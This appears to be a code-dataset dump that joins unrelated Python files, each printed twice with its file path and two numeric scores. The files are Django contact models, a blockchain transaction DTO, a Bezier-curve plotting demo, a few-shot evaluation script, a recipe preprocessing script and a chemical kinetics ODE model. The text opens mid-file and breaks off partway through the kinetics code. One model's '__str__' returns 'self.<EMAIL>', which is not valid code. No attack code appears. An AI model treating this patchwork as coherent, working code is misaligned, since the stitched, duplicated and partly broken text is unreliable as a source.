df['involved_works'] = df.groupby('related_person')['related_person']\
.transform('count')
df['grouped_by_works'] = df.groupby('involved_works')['involved_works'].transform('count')
df['grouped_by_works'] = (df['grouped_by_works'] / df['involved_works'])
df['duration'] = df.apply(lambda row: calculate_duration(row), axis=1)
df['duration'] = df.apply(lambda row: calculate_duration(row), axis=1)
payload = {}
df = df.drop(columns=['id', 'related_work', 'related_person'])
payload['data'] = df.values.tolist()
payload['columns'] = list(df)
return JsonResponse(payload)
@method_decorator(login_required, name='dispatch')
class WorkAnalyze(TemplateView):
template_name = "analyze/basic.html" | 0.580828 | 0.14448 |
from django.db import models
from django.contrib.auth.models import User
"""
UserWrapper for user account
"""
class UserWrapper(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
def __str__(self):
return self.user.username
"""
Tag for contact (e.g. work contact, etc)
"""
class ContactTag(models.Model):
name = models.CharField(max_length=200, null=True)
user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
def __str__(self):
return self.name
"""
Contact (a person)
"""
class Contact(models.Model):
name = models.CharField(max_length=300, null=True)
description = models.CharField(max_length=1000, null=True, blank=True)
organization = models.CharField(max_length=200, null=True, blank=True)
date_created = models.DateTimeField(auto_now_add=True, null=True)
contact_tags = models.ManyToManyField(ContactTag)
profile_pic = models.ImageField(default="profile.png", null=True, blank=True)
user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
def __str__(self):
return self.name
"""
Method/Type of a contact point (email, etc)
"""
class ContactPointMethod(models.Model):
name = models.CharField(max_length=300, null=True)
description = models.CharField(max_length=1000, null=True, blank=True)
link = models.CharField(max_length=1000, null=True, blank=True)
hours_for_response = models.FloatField(null=True, blank=True)
date_created = models.DateTimeField(auto_now_add=True, null=True)
user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
def __str__(self):
return self.<EMAIL>
"""
Contact point specific to a contact
"""
class ContactPoint(models.Model):
STATUS = (
('None', 'None'),
('Sent', 'Sent'),
('Responded - reply', 'Responded - reply'),
('Responded - done', 'Responded - done'),
)
contact = models.ForeignKey(Contact, null=True, on_delete=models.SET_NULL)
contact_point_method = models.ForeignKey(ContactPointMethod, null=True, on_delete=models.SET_NULL)
date_created = models.DateTimeField(auto_now_add=True, null=True)
status = models.CharField(max_length=100, null=True, choices=STATUS)
link = models.CharField(max_length=1000, null=True, blank=True)
notes = models.CharField(max_length=1000, null=True, blank=True)
times_used = models.IntegerField(default=0, null=True)
def __str__(self):
return self.link | accounts/models.py | from django.db import models
from django.contrib.auth.models import User
"""
UserWrapper for user account
"""
class UserWrapper(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, null=True)
def __str__(self):
return self.user.username
"""
Tag for contact (e.g. work contact, etc)
"""
class ContactTag(models.Model):
name = models.CharField(max_length=200, null=True)
user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
def __str__(self):
return self.name
"""
Contact (a person)
"""
class Contact(models.Model):
name = models.CharField(max_length=300, null=True)
description = models.CharField(max_length=1000, null=True, blank=True)
organization = models.CharField(max_length=200, null=True, blank=True)
date_created = models.DateTimeField(auto_now_add=True, null=True)
contact_tags = models.ManyToManyField(ContactTag)
profile_pic = models.ImageField(default="profile.png", null=True, blank=True)
user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
def __str__(self):
return self.name
"""
Method/Type of a contact point (email, etc)
"""
class ContactPointMethod(models.Model):
name = models.CharField(max_length=300, null=True)
description = models.CharField(max_length=1000, null=True, blank=True)
link = models.CharField(max_length=1000, null=True, blank=True)
hours_for_response = models.FloatField(null=True, blank=True)
date_created = models.DateTimeField(auto_now_add=True, null=True)
user_wrapper = models.ForeignKey(UserWrapper, null=True, on_delete=models.SET_NULL)
def __str__(self):
return self.<EMAIL>
"""
Contact point specific to a contact
"""
class ContactPoint(models.Model):
STATUS = (
('None', 'None'),
('Sent', 'Sent'),
('Responded - reply', 'Responded - reply'),
('Responded - done', 'Responded - done'),
)
contact = models.ForeignKey(Contact, null=True, on_delete=models.SET_NULL)
contact_point_method = models.ForeignKey(ContactPointMethod, null=True, on_delete=models.SET_NULL)
date_created = models.DateTimeField(auto_now_add=True, null=True)
status = models.CharField(max_length=100, null=True, choices=STATUS)
link = models.CharField(max_length=1000, null=True, blank=True)
notes = models.CharField(max_length=1000, null=True, blank=True)
times_used = models.IntegerField(default=0, null=True)
def __str__(self):
return self.link | 0.594551 | 0.095265 |
from __future__ import annotations
import typing
from .signed_transaction import SignedTransaction
from ..account.address import Address
from ..blockchain.network_type import OptionalNetworkType
from ... import util
__all__ = ['SyncAnnounce']
@util.dataclass(frozen=True)
class SyncAnnounce(util.DTO):
"""
Signed transaction to announce and sync.
:param payload: Signed transaction data.
:param hash: Transaction hash.
:param address: Transaction address.
"""
payload: str
hash: str
address: str
def __init__(
self,
payload: typing.AnyStr,
hash: typing.AnyStr,
address: str,
) -> None:
payload = util.encode_hex(payload)
hash = util.encode_hex(hash)
if len(hash) != 64:
raise ValueError('Transaction hash must be 64 characters long.')
self._set('payload', payload)
self._set('hash', hash)
self._set('address', address)
@classmethod
def create(cls, transaction: SignedTransaction):
"""
Create sync announce object from signed transaction data.
:param transaction: Signed transaction data.
"""
public_key = transaction.signer
network_type = transaction.network_type
address = Address.create_from_public_key(public_key, network_type)
return cls(
payload=transaction.payload, # type: ignore
hash=transaction.hash, # type: ignore
address=address.address,
)
@classmethod
def validate_dto(cls, data: dict) -> bool:
"""Validate the data-transfer object."""
required_keys = {'payload', 'hash', 'address'}
return (
cls.validate_dto_required(data, required_keys)
and cls.validate_dto_all(data, required_keys)
)
def to_dto(
self,
network_type: OptionalNetworkType = None,
) -> dict:
return {
'payload': self.payload,
'hash': self.hash,
'address': self.address,
}
@classmethod
def create_from_dto(
cls,
data: dict,
network_type: OptionalNetworkType = None,
):
if not cls.validate_dto(data):
raise ValueError('Invalid data-transfer object.')
return cls(
payload=data['payload'],
hash=data['hash'],
address=data['address'],
) | xpxchain/models/transaction/sync_announce.py | from __future__ import annotations
import typing
from .signed_transaction import SignedTransaction
from ..account.address import Address
from ..blockchain.network_type import OptionalNetworkType
from ... import util
__all__ = ['SyncAnnounce']
@util.dataclass(frozen=True)
class SyncAnnounce(util.DTO):
"""
Signed transaction to announce and sync.
:param payload: Signed transaction data.
:param hash: Transaction hash.
:param address: Transaction address.
"""
payload: str
hash: str
address: str
def __init__(
self,
payload: typing.AnyStr,
hash: typing.AnyStr,
address: str,
) -> None:
payload = util.encode_hex(payload)
hash = util.encode_hex(hash)
if len(hash) != 64:
raise ValueError('Transaction hash must be 64 characters long.')
self._set('payload', payload)
self._set('hash', hash)
self._set('address', address)
@classmethod
def create(cls, transaction: SignedTransaction):
"""
Create sync announce object from signed transaction data.
:param transaction: Signed transaction data.
"""
public_key = transaction.signer
network_type = transaction.network_type
address = Address.create_from_public_key(public_key, network_type)
return cls(
payload=transaction.payload, # type: ignore
hash=transaction.hash, # type: ignore
address=address.address,
)
@classmethod
def validate_dto(cls, data: dict) -> bool:
"""Validate the data-transfer object."""
required_keys = {'payload', 'hash', 'address'}
return (
cls.validate_dto_required(data, required_keys)
and cls.validate_dto_all(data, required_keys)
)
def to_dto(
self,
network_type: OptionalNetworkType = None,
) -> dict:
return {
'payload': self.payload,
'hash': self.hash,
'address': self.address,
}
@classmethod
def create_from_dto(
cls,
data: dict,
network_type: OptionalNetworkType = None,
):
if not cls.validate_dto(data):
raise ValueError('Invalid data-transfer object.')
return cls(
payload=data['payload'],
hash=data['hash'],
address=data['address'],
) | 0.930726 | 0.254631 |
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import comb
import draw
def calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset):
dist = np.hypot(sx - gx, sy - gy) / offset
control_points = np.array(
[[sx, sy],
[sx + dist * np.cos(syaw), sy + dist * np.sin(syaw)],
[gx - dist * np.cos(gyaw), gy - dist * np.sin(gyaw)],
[gx, gy]])
path = calc_bezier_path(control_points, n_points=100)
return path, control_points
def calc_bezier_path(control_points, n_points=100):
traj = []
for t in np.linspace(0, 1, n_points):
traj.append(bezier(t, control_points))
return np.array(traj)
def Comb(n, i, t):
return comb(n, i) * t ** i * (1 - t) ** (n - i)
def bezier(t, control_points):
n = len(control_points) - 1
return np.sum([Comb(n, i, t) * control_points[i] for i in range(n + 1)], axis=0)
def bezier_derivatives_control_points(control_points, n_derivatives):
w = {0: control_points}
for i in range(n_derivatives):
n = len(w[i])
w[i + 1] = np.array([(n - 1) * (w[i][j + 1] - w[i][j])
for j in range(n - 1)])
return w
def curvature(dx, dy, ddx, ddy):
return (dx * ddy - dy * ddx) / (dx ** 2 + dy ** 2) ** (3 / 2)
def simulation():
sx = [-3, 0, 4, 6]
sy = [2, 0, 1.5, 6]
ratio = np.linspace(0, 1, 100)
pathx, pathy = [], []
for t in ratio:
x, y = [], []
for i in range(len(sx) - 1):
x.append(sx[i + 1] * t + sx[i] * (1 - t))
y.append(sy[i + 1] * t + sy[i] * (1 - t))
xx, yy = [], []
for i in range(len(x) - 1):
xx.append(x[i + 1] * t + x[i] * (1 - t))
yy.append(y[i + 1] * t + y[i] * (1 - t))
px = xx[1] * t + xx[0] * (1 - t)
py = yy[1] * t + yy[0] * (1 - t)
pathx.append(px)
pathy.append(py)
plt.cla()
plt.plot(sx, sy, linestyle='-', marker='o', color='dimgray', label="Control Points")
plt.plot(x, y, color='dodgerblue')
plt.plot(xx, yy, color='cyan')
plt.plot(pathx, pathy, color='darkorange', linewidth=2, label="Bezier Path")
plt.plot(px, py, marker='o')
plt.axis("equal")
plt.legend()
plt.title("Cubic Bezier Curve demo")
plt.grid(True)
plt.pause(0.001)
plt.show()
def main():
sx, sy, syaw = 10.0, 1.0, np.deg2rad(180.0)
gx, gy, gyaw = 0.0, -3.0, np.deg2rad(-45.0)
offset = 3.0
path, control_points = calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset)
t = 0.8 # Number in [0, 1]
x_target, y_target = bezier(t, control_points)
derivatives_cp = bezier_derivatives_control_points(control_points, 2)
point = bezier(t, control_points)
dt = bezier(t, derivatives_cp[1])
ddt = bezier(t, derivatives_cp[2])
# Radius of curv
radius = 1 / curvature(dt[0], dt[1], ddt[0], ddt[1])
# Normalize derivative
dt /= np.linalg.norm(dt, 2)
tangent = np.array([point, point + dt])
normal = np.array([point, point + [- dt[1], dt[0]]])
curvature_center = point + np.array([- dt[1], dt[0]]) * radius
circle = plt.Circle(tuple(curvature_center), radius,
color=(0, 0.8, 0.8), fill=False, linewidth=1)
assert path.T[0][0] == sx, "path is invalid"
assert path.T[1][0] == sy, "path is invalid"
assert path.T[0][-1] == gx, "path is invalid"
assert path.T[1][-1] == gy, "path is invalid"
fig, ax = plt.subplots()
ax.plot(path.T[0], path.T[1], label="Bezier Path")
ax.plot(control_points.T[0], control_points.T[1],
'--o', label="Control Points")
ax.plot(x_target, y_target)
ax.plot(tangent[:, 0], tangent[:, 1], label="Tangent")
ax.plot(normal[:, 0], normal[:, 1], label="Normal")
ax.add_artist(circle)
draw.Arrow(sx, sy, syaw, 1, "darkorange")
draw.Arrow(gx, gy, gyaw, 1, "darkorange")
plt.grid(True)
plt.title("Bezier Path: from Atsushi's work")
ax.axis("equal")
plt.show()
if __name__ == '__main__':
main()
# simulation() | CurvesGenerator/bezier_path.py | import numpy as np
import matplotlib.pyplot as plt
from scipy.special import comb
import draw
def calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset):
dist = np.hypot(sx - gx, sy - gy) / offset
control_points = np.array(
[[sx, sy],
[sx + dist * np.cos(syaw), sy + dist * np.sin(syaw)],
[gx - dist * np.cos(gyaw), gy - dist * np.sin(gyaw)],
[gx, gy]])
path = calc_bezier_path(control_points, n_points=100)
return path, control_points
def calc_bezier_path(control_points, n_points=100):
traj = []
for t in np.linspace(0, 1, n_points):
traj.append(bezier(t, control_points))
return np.array(traj)
def Comb(n, i, t):
return comb(n, i) * t ** i * (1 - t) ** (n - i)
def bezier(t, control_points):
n = len(control_points) - 1
return np.sum([Comb(n, i, t) * control_points[i] for i in range(n + 1)], axis=0)
def bezier_derivatives_control_points(control_points, n_derivatives):
w = {0: control_points}
for i in range(n_derivatives):
n = len(w[i])
w[i + 1] = np.array([(n - 1) * (w[i][j + 1] - w[i][j])
for j in range(n - 1)])
return w
def curvature(dx, dy, ddx, ddy):
return (dx * ddy - dy * ddx) / (dx ** 2 + dy ** 2) ** (3 / 2)
def simulation():
sx = [-3, 0, 4, 6]
sy = [2, 0, 1.5, 6]
ratio = np.linspace(0, 1, 100)
pathx, pathy = [], []
for t in ratio:
x, y = [], []
for i in range(len(sx) - 1):
x.append(sx[i + 1] * t + sx[i] * (1 - t))
y.append(sy[i + 1] * t + sy[i] * (1 - t))
xx, yy = [], []
for i in range(len(x) - 1):
xx.append(x[i + 1] * t + x[i] * (1 - t))
yy.append(y[i + 1] * t + y[i] * (1 - t))
px = xx[1] * t + xx[0] * (1 - t)
py = yy[1] * t + yy[0] * (1 - t)
pathx.append(px)
pathy.append(py)
plt.cla()
plt.plot(sx, sy, linestyle='-', marker='o', color='dimgray', label="Control Points")
plt.plot(x, y, color='dodgerblue')
plt.plot(xx, yy, color='cyan')
plt.plot(pathx, pathy, color='darkorange', linewidth=2, label="Bezier Path")
plt.plot(px, py, marker='o')
plt.axis("equal")
plt.legend()
plt.title("Cubic Bezier Curve demo")
plt.grid(True)
plt.pause(0.001)
plt.show()
def main():
sx, sy, syaw = 10.0, 1.0, np.deg2rad(180.0)
gx, gy, gyaw = 0.0, -3.0, np.deg2rad(-45.0)
offset = 3.0
path, control_points = calc_4points_bezier_path(sx, sy, syaw, gx, gy, gyaw, offset)
t = 0.8 # Number in [0, 1]
x_target, y_target = bezier(t, control_points)
derivatives_cp = bezier_derivatives_control_points(control_points, 2)
point = bezier(t, control_points)
dt = bezier(t, derivatives_cp[1])
ddt = bezier(t, derivatives_cp[2])
# Radius of curv
radius = 1 / curvature(dt[0], dt[1], ddt[0], ddt[1])
# Normalize derivative
dt /= np.linalg.norm(dt, 2)
tangent = np.array([point, point + dt])
normal = np.array([point, point + [- dt[1], dt[0]]])
curvature_center = point + np.array([- dt[1], dt[0]]) * radius
circle = plt.Circle(tuple(curvature_center), radius,
color=(0, 0.8, 0.8), fill=False, linewidth=1)
assert path.T[0][0] == sx, "path is invalid"
assert path.T[1][0] == sy, "path is invalid"
assert path.T[0][-1] == gx, "path is invalid"
assert path.T[1][-1] == gy, "path is invalid"
fig, ax = plt.subplots()
ax.plot(path.T[0], path.T[1], label="Bezier Path")
ax.plot(control_points.T[0], control_points.T[1],
'--o', label="Control Points")
ax.plot(x_target, y_target)
ax.plot(tangent[:, 0], tangent[:, 1], label="Tangent")
ax.plot(normal[:, 0], normal[:, 1], label="Normal")
ax.add_artist(circle)
draw.Arrow(sx, sy, syaw, 1, "darkorange")
draw.Arrow(gx, gy, gyaw, 1, "darkorange")
plt.grid(True)
plt.title("Bezier Path: from Atsushi's work")
ax.axis("equal")
plt.show()
if __name__ == '__main__':
main()
# simulation() | 0.690142 | 0.618147 |
import os
import torch
import tensorflow as tf
import numpy as np
from tqdm import tqdm
from tabulate import tabulate
from utils import check_dir
from models.losses import prototype_loss, knn_loss, lr_loss, scm_loss, svm_loss
from models.model_utils import CheckPointer
from models.model_helpers import get_model
from models.pa import apply_selection, pa
from data.meta_dataset_reader import (MetaDatasetEpisodeReader, MetaDatasetBatchReader, TRAIN_METADATASET_NAMES,
ALL_METADATASET_NAMES)
from config import args
def main():
TEST_SIZE = 600
# Setting up datasets
trainsets, valsets, testsets = args['data.train'], args['data.val'], args['data.test']
testsets = ALL_METADATASET_NAMES # comment this line to test the model on args['data.test']
trainsets = TRAIN_METADATASET_NAMES
test_loader = MetaDatasetEpisodeReader('test', trainsets, trainsets, testsets, test_type=args['test.type'])
model = get_model(None, args)
checkpointer = CheckPointer(args, model, optimizer=None)
checkpointer.restore_model(ckpt='best', strict=False)
model.eval()
accs_names = ['NCC']
var_accs = dict()
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = False
with tf.compat.v1.Session(config=config) as session:
# go over each test domain
for dataset in testsets:
if dataset in TRAIN_METADATASET_NAMES:
lr = 0.1
else:
lr = 1
print(dataset)
var_accs[dataset] = {name: [] for name in accs_names}
for i in tqdm(range(TEST_SIZE)):
with torch.no_grad():
sample = test_loader.get_test_task(session, dataset)
context_features = model.embed(sample['context_images'])
target_features = model.embed(sample['target_images'])
context_labels = sample['context_labels']
target_labels = sample['target_labels']
# optimize selection parameters and perform feature selection
selection_params = pa(context_features, context_labels, max_iter=40, lr=lr, distance=args['test.distance'])
selected_context = apply_selection(context_features, selection_params)
selected_target = apply_selection(target_features, selection_params)
_, stats_dict, _ = prototype_loss(
selected_context, context_labels,
selected_target, target_labels, distance=args['test.distance'])
var_accs[dataset]['NCC'].append(stats_dict['acc'])
dataset_acc = np.array(var_accs[dataset]['NCC']) * 100
print(f"{dataset}: test_acc {dataset_acc.mean():.2f}%")
# Print nice results table
print('results of {}'.format(args['model.name']))
rows = []
for dataset_name in testsets:
row = [dataset_name]
for model_name in accs_names:
acc = np.array(var_accs[dataset_name][model_name]) * 100
mean_acc = acc.mean()
conf = (1.96 * acc.std()) / np.sqrt(len(acc))
row.append(f"{mean_acc:0.2f} +- {conf:0.2f}")
rows.append(row)
out_path = os.path.join(args['out.dir'], 'weights')
out_path = check_dir(out_path, True)
out_path = os.path.join(out_path, '{}-{}-{}-{}-test-results.npy'.format(args['model.name'], args['test.type'], 'pa', args['test.distance']))
np.save(out_path, {'rows': rows})
table = tabulate(rows, headers=['model \\ data'] + accs_names, floatfmt=".2f")
print(table)
print("\n")
if __name__ == '__main__':
main() | test_extractor_pa.py | import os
import torch
import tensorflow as tf
import numpy as np
from tqdm import tqdm
from tabulate import tabulate
from utils import check_dir
from models.losses import prototype_loss, knn_loss, lr_loss, scm_loss, svm_loss
from models.model_utils import CheckPointer
from models.model_helpers import get_model
from models.pa import apply_selection, pa
from data.meta_dataset_reader import (MetaDatasetEpisodeReader, MetaDatasetBatchReader, TRAIN_METADATASET_NAMES,
ALL_METADATASET_NAMES)
from config import args
def main():
TEST_SIZE = 600
# Setting up datasets
trainsets, valsets, testsets = args['data.train'], args['data.val'], args['data.test']
testsets = ALL_METADATASET_NAMES # comment this line to test the model on args['data.test']
trainsets = TRAIN_METADATASET_NAMES
test_loader = MetaDatasetEpisodeReader('test', trainsets, trainsets, testsets, test_type=args['test.type'])
model = get_model(None, args)
checkpointer = CheckPointer(args, model, optimizer=None)
checkpointer.restore_model(ckpt='best', strict=False)
model.eval()
accs_names = ['NCC']
var_accs = dict()
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = False
with tf.compat.v1.Session(config=config) as session:
# go over each test domain
for dataset in testsets:
if dataset in TRAIN_METADATASET_NAMES:
lr = 0.1
else:
lr = 1
print(dataset)
var_accs[dataset] = {name: [] for name in accs_names}
for i in tqdm(range(TEST_SIZE)):
with torch.no_grad():
sample = test_loader.get_test_task(session, dataset)
context_features = model.embed(sample['context_images'])
target_features = model.embed(sample['target_images'])
context_labels = sample['context_labels']
target_labels = sample['target_labels']
# optimize selection parameters and perform feature selection
selection_params = pa(context_features, context_labels, max_iter=40, lr=lr, distance=args['test.distance'])
selected_context = apply_selection(context_features, selection_params)
selected_target = apply_selection(target_features, selection_params)
_, stats_dict, _ = prototype_loss(
selected_context, context_labels,
selected_target, target_labels, distance=args['test.distance'])
var_accs[dataset]['NCC'].append(stats_dict['acc'])
dataset_acc = np.array(var_accs[dataset]['NCC']) * 100
print(f"{dataset}: test_acc {dataset_acc.mean():.2f}%")
# Print nice results table
print('results of {}'.format(args['model.name']))
rows = []
for dataset_name in testsets:
row = [dataset_name]
for model_name in accs_names:
acc = np.array(var_accs[dataset_name][model_name]) * 100
mean_acc = acc.mean()
conf = (1.96 * acc.std()) / np.sqrt(len(acc))
row.append(f"{mean_acc:0.2f} +- {conf:0.2f}")
rows.append(row)
out_path = os.path.join(args['out.dir'], 'weights')
out_path = check_dir(out_path, True)
out_path = os.path.join(out_path, '{}-{}-{}-{}-test-results.npy'.format(args['model.name'], args['test.type'], 'pa', args['test.distance']))
np.save(out_path, {'rows': rows})
table = tabulate(rows, headers=['model \\ data'] + accs_names, floatfmt=".2f")
print(table)
print("\n")
if __name__ == '__main__':
main() | 0.609524 | 0.276086 |
import json
from nltk.tokenize import RegexpTokenizer
def read_raw_data(filename):
with open(filename, "r", encoding="utf8") as data_file:
data_file_lines = data_file.readlines()
recipe_list = []
for line in data_file_lines:
recipe_list.append(json.loads(line))
return recipe_list
def write_json_data(json_data, filename):
with open(filename, "w", encoding="utf8") as data_outfile:
json.dump(json_data, data_outfile, indent=4)
def feature_selection(recipe_list):
recipes_list_feature_selected = []
for i in range(len(recipe_list)):
ingredients_detailed = recipe_list[i]["ingredient"]
ingredients = []
for ingredient_detailed in ingredients_detailed:
try:
ingredient = ingredient_detailed["ingredients"][0]
ingredients.append(ingredient)
except:
ingredient = ""
ingredients.append(ingredient)
ingredients = list(filter(None, ingredients))
recipes_list_feature_selected.append(
{
"id": i,
"title": recipe_list[i]["title"],
"ingredients": ingredients,
"instructions": recipe_list[i]["instructions"],
"url": recipe_list[i]["url"],
"photo": recipe_list[i]["photo_url"],
}
)
return recipes_list_feature_selected
def tokenization(recipe_list):
tokenizer = RegexpTokenizer(r"\\w+")
recipe_list_tokenized = recipe_list
for recipe, recipe_tokenized in zip(recipe_list, recipe_list_tokenized):
ingredient_list = list(set(recipe["ingredients"]))
ingredient_list_tokenized = []
for ingredient in ingredient_list:
ingredient_tokenized = "-".join(
tokenizer.tokenize(ingredient.lower()))
ingredient_list_tokenized.append(ingredient_tokenized)
ingredient_list_tokenized = list(set(ingredient_list_tokenized))
recipe_tokenized["ingredients"] = ingredient_list_tokenized
return recipe_list_tokenized
def load_into_corpus_list(recipe_list):
corpus_set = set()
for recipe in recipe_list:
corpus_set.update(set(recipe["ingredients"]))
corpus_list_sorted = sorted(corpus_set, reverse=True)
corpus_list = []
for id, item in zip(range(len(corpus_list_sorted)), corpus_list_sorted):
corpus_list.append({"id": id, "text": item})
return corpus_list
def main():
recipe_list = read_raw_data("data/raw.json")
recipe_list = feature_selection(recipe_list)
recipe_list = tokenization(recipe_list)
write_json_data(recipe_list, "data/data.json")
corpus_list = load_into_corpus_list(recipe_list)
write_json_data(corpus_list, "data/corpus.json")
if __name__ == "__main__":
main() | py-data-preprocess.py | import json
from nltk.tokenize import RegexpTokenizer
def read_raw_data(filename):
with open(filename, "r", encoding="utf8") as data_file:
data_file_lines = data_file.readlines()
recipe_list = []
for line in data_file_lines:
recipe_list.append(json.loads(line))
return recipe_list
def write_json_data(json_data, filename):
with open(filename, "w", encoding="utf8") as data_outfile:
json.dump(json_data, data_outfile, indent=4)
def feature_selection(recipe_list):
recipes_list_feature_selected = []
for i in range(len(recipe_list)):
ingredients_detailed = recipe_list[i]["ingredient"]
ingredients = []
for ingredient_detailed in ingredients_detailed:
try:
ingredient = ingredient_detailed["ingredients"][0]
ingredients.append(ingredient)
except:
ingredient = ""
ingredients.append(ingredient)
ingredients = list(filter(None, ingredients))
recipes_list_feature_selected.append(
{
"id": i,
"title": recipe_list[i]["title"],
"ingredients": ingredients,
"instructions": recipe_list[i]["instructions"],
"url": recipe_list[i]["url"],
"photo": recipe_list[i]["photo_url"],
}
)
return recipes_list_feature_selected
def tokenization(recipe_list):
tokenizer = RegexpTokenizer(r"\\w+")
recipe_list_tokenized = recipe_list
for recipe, recipe_tokenized in zip(recipe_list, recipe_list_tokenized):
ingredient_list = list(set(recipe["ingredients"]))
ingredient_list_tokenized = []
for ingredient in ingredient_list:
ingredient_tokenized = "-".join(
tokenizer.tokenize(ingredient.lower()))
ingredient_list_tokenized.append(ingredient_tokenized)
ingredient_list_tokenized = list(set(ingredient_list_tokenized))
recipe_tokenized["ingredients"] = ingredient_list_tokenized
return recipe_list_tokenized
def load_into_corpus_list(recipe_list):
corpus_set = set()
for recipe in recipe_list:
corpus_set.update(set(recipe["ingredients"]))
corpus_list_sorted = sorted(corpus_set, reverse=True)
corpus_list = []
for id, item in zip(range(len(corpus_list_sorted)), corpus_list_sorted):
corpus_list.append({"id": id, "text": item})
return corpus_list
def main():
recipe_list = read_raw_data("data/raw.json")
recipe_list = feature_selection(recipe_list)
recipe_list = tokenization(recipe_list)
write_json_data(recipe_list, "data/data.json")
corpus_list = load_into_corpus_list(recipe_list)
write_json_data(corpus_list, "data/corpus.json")
if __name__ == "__main__":
main() | 0.186428 | 0.163212 |
from scipy.integrate import odeint
import numpy
import matplotlib.pyplot as plt
# constantes de vitesse
k1 = 10**8
km1 = 10**2
k2 = 10**10
km2 = 10**2
k3 = 10**3
km3 = 10**16
k5 = 1.47*(10**6)
k6 = 1.4*(10**9)
k7 = 4.4*(10**9)
k8 = 10**7
# autres constantes
Iabs = 10**(-7) # variable
phi_T = 1
phi_C = 1
# définition du système étudié
def sys_cinetique(Z,t):
# espèces intervenant dans le système
Am = Z[0]
A = Z[1]
Pt = Z[2]
Ptm = Z[3]
Hp = Z[4]
H2 = Z[5]
PtH = Z[6]
S_etoile = Z[7]
Sp = Z[8]
S = Z[9]
D = Z[10]
# equadiff
dAmdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k1*Am*Pt + km1*Ptm*A
dAdt = -k6*phi_C*S_etoile*A + k7*Sp*Am + k1*Am*Pt - km1*Ptm*A
dPtdt = -k1*Am*Pt + km1*Ptm*A + 2*k3*(PtH**2) - 2*km3*H2*(Pt**2)
dPtmdt = k1*Am*Pt - km1*Ptm*A - k2*Ptm*Hp + km2*PtH
dHpdt = km2*PtH - k2*Ptm*Hp
dH2dt = k3*(PtH**2) - km3*H2*(Pt**2)
dPtHdt = k2*Ptm*Hp - km2*PtH - 2*k3*(PtH**2) + 2*km3*H2*(Pt**2)
dS_etoiledt = Iabs*phi_T*S - k5*S_etoile - k6*phi_C*S_etoile*A
dSpdt = k6*phi_C*S_etoile*A - k7*Sp*Am - k8*Sp*D
dSdt = -Iabs*phi_T*S + k5*S_etoile + k7*Sp*Am + k8*Sp*D
dDdt = -k8*Sp*D
return [dAmdt, dAdt, dPtdt, dPtmdt, dHpdt, dH2dt, dPtHdt, dS_etoiledt, dSpdt, dSdt, dDdt]
# conditions initiales
Am0 = 0
A0 = 10**(-3) # varie
Pt0 = 10**(-5) # varie
Ptm0 = 0
Hp0 = 10**(-5)
H20 = 0
PtH0 = 0
S_etoile0 = 0
Sp0 = 0
S0 = 10**(-4)
D0 = 10**(-2)
Z0 = [Am0, A0, Pt0, Ptm0, Hp0, H20, PtH0, S_etoile0, Sp0, S0, D0]
# plage de temps calculée ( t_min, t_max, nb_de_points_calculés )
t = numpy.linspace(0, 2*10**8, 100000)
# équivalent à t = numpy.logspace(1, 8, num=100000) pour avoir directement en échelle log
# ODE
soln = odeint(sys_cinetique, Z0, t, rtol=1.49012*10**(-15), atol=1.49012*10**(-15), mxstep=5000000)
# graphes concentration en fonction du temps
plt.figure(1) # utile si on veut plusieurs figures
plt.subplot(221) # figure 1 est divisée en 4 graphes (2*2), ici le N°1
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.title('Evolution de [A-]')
#plt.legend() pas nécessaire ici car une seule courbe par graphe
#plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(222)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.title('Evolution de [H2]')
#plt.legend()
#plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(223)
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
plt.title('Evolution de [PtH]')
#plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.subplot(224)
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution de [Pt]')
#plt.legend()
plt.xlabel("Temps en secondes")
#plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.figure(2)
plt.plot(t,soln[:,0],color='blue', linestyle='solid', label='A-') # (axe_x, axe_y, ...)
plt.plot(t,soln[:,5], color='red', linestyle='solid', label='H2')
plt.plot(t,soln[:,6],color='green', linestyle='solid', label='PtH')
#plt.plot(t,soln[:,3],color='orange', linestyle='solid', label='Pt-')
plt.plot(t,soln[:,2],color='brown', linestyle='solid', label='Pt')
plt.title('Evolution du système')
plt.legend()
plt.xlabel("Temps en secondes")
plt.ylabel("Concentration en M")
plt.yscale('log') # linear par défaut, autre option : log
plt.xscale('log')
plt.show()
#plt.savefig('test.png') | Ebbesen.py | from scipy.integrate import odeint
import numpy
import matplotlib.pyplot as plt
# constantes de vitesse
k1 = 10**8
km1 = 10**2
k2 = 10**10
km2 = 10**2
k3 = 10**3
km3 = 10**16
k5 = 1.47*(10**6)
k6 = 1.4*(10**9)
k7 = 4.4*(10**9)
k8 = 10**7
# autres constantes
Iabs = 10**(-7) # variable
phi_T = 1
phi_C = 1
# définition du système étudié
def sys_cinetique(Z,t):
# espèces intervenant dans le système
Am = Z[0]
A = Z[1]
Pt = Z[2]
Ptm = Z[3]
Hp = Z[4]
H2 = Z[5]
PtH = Z[6]
S_etoile = Z[7]
Sp = Z[8]
S = Z[9]
D = Z[10]
# equadiff
